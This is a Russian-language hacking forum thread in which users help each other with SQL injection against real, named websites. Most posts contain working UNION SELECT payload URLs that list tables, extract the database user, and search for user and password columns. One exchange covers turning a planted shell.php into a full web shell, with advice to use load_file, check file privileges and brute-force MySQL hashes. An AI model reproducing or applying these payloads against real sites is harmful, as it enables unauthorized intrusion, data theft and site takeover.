facepalm !!!, испортил настроение ...читай школоло мануалы..не забудь остановится в разделе про LIMIT ...откуда вы беретесь...иди лучше уроки готовь и пиши сочинение "как я провел новогодние каникулы"
qaz Как бы воут,почитай факи. http://www.feb.spb.ru/news.php?id=100+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--+
Если кому не трудно - поясните мне такую ситуацию Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал, почему это случилось, что это и с чем это едят, за ранее благодарю ))
снанил сайты и попался такой: http://www.sonicscience.com/store/index.php?id=0+uNioN+alL+sEleCT+1-- можете сказать что тут "уязвиного" ? как то я ничего не видел там.. но прога выдает, как уязвимым.
B1t.exe там ничего нет. и давайте не будем обсуждать <программы> подобного рода, и будем больше использовать свои знания.
Доброго. объясните темному пожалуйста, куда копать в таком случае: https://secure.webblake.com/ShoppingCart569.php?k=query_here не выводит ошибки вовсе. только саму квери если битая. в тоже время параметр учавствует в 2х запросах, и вывести его, чтобы не вызывало ошибки - не могу.
http://www.mibf.ru/index.php?id=-1+union+select+null,null,null,null,null,null,null,user(),null,null--+ И в адресной строке ты увидешь: http://www.mibf.ru/mibf@localhost Ну ты понел...
привет залил команду через бд, получился файл shell.php подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть xxx.narod.ru/1.php
Раз у тебя столько баз,значит и mysql скорее всего тоже доступна. Значит пробуй лоад_файл,ищи пути,когда найдешь проверяй файл_прив и если все ок то лей шелл.Если не вышло,попробуй найти пыхпмайадмин,сбрутив хеши майскул юзверов.
docw_p Так не получится, так как столбцы имеют вид, который был предоставлен Nightmarе. Nightmarе В таких случаях можно сделать примерно так Code: select distinct(table_name) from information_schema.columns where column_name like '%user%' Где символ "%" справа и слева означает, что слово "user" может быть и в начале, и в середине и в конце колонки. Но я бы искал не по слову "user", если тебя интересуют все пользователи, а не только форума, а по паролю запросом вида: Code: select distinct(table_name) from information_schema.columns where column_name like '%pass%'
я бы сделал вот так, если по каким то конкретным именам таблиц: SELECT group_concat(table_schema) from information_schema.tables where table_name=0x... либо если не слеширует то через Like
-1'+union+select+group_concat(table_schema,0x2d,table_name,0x2d,column_name),2+from+information_schema.columns+where+table_name+like+'%user%'+or+column_name+like+'%user%'--+
Я часто делаю так: заменяю все цифры на user(), затем открываю исходник и ищу по символу @. М.б. ламерский способ, но меня выручал всегда. Кста, в твоем примере там ты указываешь null, а надо цифры. Скорей всего, у тебя есть доступ к базам (обычно можно получить только имена) других сайтов на этом серваке.
http://www.elephant.se/location2.php?location_id=513'+union+select+1,2,3,table_name,5,6,7,8,9,10++from+information_schema.tables--+ иди млять и читай мануалы по скулям, сколько можно постить бред..и спрашивать то что уже миллион раз в данной теме перемалывали...стандартная скуля...нормально составь запрос...
Зашёл в тупик: есть слепая инъекция. Не могу понять, то ли фильтруется from, то ли нет доступа к information_schema. Как определить? первый способ это просто брутить таблицы в данной базе чтобы определить работает ли from, но этот метод далеко неэфективен причины думаю ясны. Какие есть идеи